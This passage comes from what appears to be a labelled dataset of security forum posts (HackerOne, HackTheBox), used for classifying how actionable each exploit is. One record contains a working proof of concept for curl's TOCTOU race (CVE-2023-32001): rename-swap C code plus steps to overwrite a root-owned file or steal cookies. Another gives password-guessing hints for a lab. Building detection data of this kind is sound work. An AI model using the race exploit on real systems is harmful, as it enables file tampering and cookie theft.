compromise the entire system.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-08-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "a64a8375e865bc992065", "text": "Finally I did it. @mezzown was right. Whoever stuck with this task, read @mezzown comment attentively and revise ‘shellcode requirements’ once again.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-06-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "609b9cd2ee45040514cb", "text": "[Time-of-check Time-of-use (TOCTOU) Race Condition] CVE-2023-32001: fopen race condition\n\nAs we can see in the following curl code (line 59-61 https://github.com/curl/curl/blob/fb802b521af997230b65174a559f5c419520e142/lib/fopen.c ): \n```C\n if(stat(filename, &sb) == -1 || !S_ISREG(sb.st_mode)) {\n /* a non-regular file, fallback to direct fopen() */\n *fh = fopen(filename, FOPEN_WRITETEXT);\n...\n}\n...\n```\nThere is a race condition between the moment \"stat(filename, &sb)\" is executed and the moment \" fopen(filename, FOPEN_WRITETEXT);\" is executed.\nThis leads to undesirable behavior such as an attacker tricking a privileged user to overwrite protected files, or since this function (Curl_fopen) is also used for storing cookies an attacker could trick another user to send those cookies that might be very sensible to a file fully owned and controlled by the attacker.\n\n###POC/Steps to reproduce:\nBefore we start, I will be using a little program called \"rename\". Which simply swaps atomically the names of two files to be able to showcase this race condition. Here is its code :\n```\n#include \n#include \n#include \n#include \n#include \n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n\n// source https://github.com/sroettger/35c3ctf_chals/blob/master/logrotate/exploit/rename.c\nint main(int argc, char *argv[]) {\n while (1) {\n syscall(SYS_renameat2, AT_FDCWD, argv[1], AT_FDCWD, argv[2], RENAME_EXCHANGE);\n }\n return 0;\n}\n```\n\nOpen two terminals, with two different users. One will be the attacker terminal and the other the victim. \nIn both POCs, the victim will want to execute a command such as \"curl --cookie-jar a google.com\" thinking the file \"a\" doesn't exist.\n\n###A) Exploiting this vulnerability to trick a user to overwrite a file they own:\n\nAssume the current directory of both attacker(selmelc) and victim (root) looks like this\n```SHELL\nlrwxrwxrwx 1 selmelc selmelc 4 Jun 27 07:11 a -> flag\ndrwxrwxrwx 2 selmelc selmelc 4096 Jun 27 07:11 b\n-rw-r--r-- 1 root root 6 Jun 27 07:05 flag\n-rwxr-x--- 1 selmelc selmelc 16608 Jun 27 07:04 rename\n```\nThe attacker executes ./rename a b, which will not stop to swap the name of the directory \"b\" and the symlink \"a\". \n\nThe victim executes their command \"curl --cookie-jar a google.com\".\nThe race condition is successfully exploited if in the vulnerable code the stat identifies the file \"a\" as a directory and then the \"fopen\" opens the symlink that points to the file \"flag\".\nIf that happened then the results looks like this :\n```\n...\n-rw-r--r-- 1 root root 131 Jun 27 07:13 flag\n...\nroot@deb:/home/selmelc/Documents# cat flag\n# Netscape HTTP Cookie File\n# https://curl.se/docs/http-cookies.html\n# This file was generated by libcurl! Edit at your own risk.\n```\nAdditional note: \nYou might think \"well that's just how symlinks work\"... To clarify on that, by default if the victim was executing \"curl --cookie-jar a google.com\" without the attacker exploiting the vuln. a different behavior would occur ; the file \"a\" would be erased (no more symlink) and overwritten as a regular file containing the cookie data. This happens because the stat function follows symbolic links therefore in that scenario we would not enter the vulnerable condition which leads to the race condition.\n\n###B) Exploiting this vulnerability to steal the victim's cookies and hide it from them:\n\nAs this uses the same logic as the previous exploit for this vuln. Repeat same steps except this time we want the \"flag\" file to be owned by the attacker as following:\n```\nlrwxrwxrwx 1 selmelc selmelc 4 Jun 27 08:42 a -> flag\ndrwxrwxrwx 2 selmelc selmelc 4096 Jun 27 08:41 b\n-rw--w--w- 1 selmelc selmelc 0 Jun 27 08:41 flag\n-rwxr-x--- 1 selmelc selmelc 16608 Jun 27 07:04 rename\n\n```\nNormal curl behavior after the victim executed \"curl --cookie-jar a google.com\" :\n```\n-rw------- 1 root root 131 Jun 27 08:49 a\ndrwxrwxrwx 2 selmelc selmelc 4096 Jun 27 08:41 b\n-rw--w--w- 1 selmel", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2023-32001"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-07-25", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c6a342e0e5c0b3e5a879", "text": "Hello, “Skills Assessment - Service Login” is connected with “Skills Assessment - Website”. So, the username is what you think. Furthermore, try to follow the hint of only use the first name (Ha***) to create password, use seed to only keep passwords which are compliant with the policy, and create the usernames with UsernameGenerator (here use fullname Ha*** Po****).", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-04-10", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "de3fa82147bdd939d11a", "text": "never mind, I’ve found it. I think I mistyped on my first attempt", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-01-02", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4e1d0606f91bf90c9506", "text": "[Improper Check or Handling of Exceptional Conditions] curl proceeds with unsafe connections when -K file can't be read\n\n## Summary:\nI'm using curl 7.82.0 on Linux. When the file specified by the -K option can't be read, curl sends network traffic as specified by the other options that are explicitly included on the command line (in other words, there's only a warning and I'd like it to be a fatal error). This behavior occurs even if those other options result in an action that's often considered unsafe, such as use of cleartext passwords. It's fine for curl to be capable of sending cleartext passwords, but this shouldn't happen unintentionally.\n\nI feel that this is a vulnerability in curl because curl is able to recognize that the user's intended set of options was not specified correctly, but curl still decides to send network traffic corresponding to the known subset of those options. One might argue that, philosophically, curl prefers to send network traffic even if the user's input is underspecified; however, this isn't true elsewhere in curl. For example, if the user misspells one of the options on the command line, curl doesn't simply ignore that one, and do whatever is specified by the remaining, correctly spelled options. Instead, any misspelled option is a fatal error, and curl sends no network traffic at all. My suggestion is to make this -K situation consistent with that, i.e., if the file specified by -K can't be read, then that is a fatal error and no network traffic is sent.\n\n## Steps To Reproduce:\n 1. Begin typing a curl command line that uses the -K option followed by a filename.\n 2. Create the file with that filename.\n 3. Within the file, include a curl option that is typically regarded as making network traffic more safe, e.g., the --ssl-reqd option.\n 4. Ensure that the curl process cannot read this file.\n 5. Enter the curl command.\n 6. Observe that curl does **not** exit with an error message stating that the file can't be read.\n 7. Observe that curl makes the network connection without the safety measure chosen in step 3.\n\n## Supporting Material/References:\nA fatal error is the approach taken by many other programs in analogous cases, i.e., the program allows a security-relevant user-specified configuration file on the command line, and that file can't be read, e.g.,\n```\n % ssh -F /home/user/my-safe-ssh-options/not-exist.config example.com\n Can't open user config file /home/user/my-safe-ssh-options/not-exist.config: No such file or directory\n\n % tar -X /home/user/list-of-my-private-key-files/not-exist.config -c -f public.tar .\n tar: /home/user/list-of-my-private-key-files/not-exist.config: No such file or directory\n tar: Error is not recoverable: exiting now\n```\nIn other words, ssh realizes it would be wrong to simply use the system-wide SSH client configuration when the user is clearly trying to use a different configuration. The tar program realizes it would be wrong to simply place every file into a public archive, when the user is clearly trying to use -X to exclude specific files. With curl, the user is clearly trying to add some options, which may perhaps be critical for security in that user's use case.\n\nHere's an example in which a curl user wishes to send secret credentials to an FTP server only if the FTP server supports SSL, analogous to the ==curl --ssl-reqd ftp://example.com== example on the https://curl.se/docs/manpage.html page. The user chooses to use only a filename (named my-curl-ftp-options.config below), not a full pathname, with the -K option, just as in the ==curl --config file.txt https://example.com== example on that page.\n\nThis example includes a user mistake, but the vulnerability is also relevant without any user mistake.\n\nSSL detection works fine if the user's current working directory contains the my-curl-ftp-options.config file. However, the user then makes the realistic mistake of changing to a different working directory without changing the -K value. (Here, the user goes to the /mnt/LargeVolume/user directory because it has much more disk space for storing", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-21", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "f07647f9fb1566472df9", "text": "[Cross-site Scripting (XSS) - Reflected] CVE-2020-11022\n\n## Summary:\nCVE-2020-11022 at \" https://app.spiketrap.io/users/sign_in \"\n\n## Steps To Reproduce:\n\n Cross-Site Scripting (XSS)\n# Proof of Concept 1:\n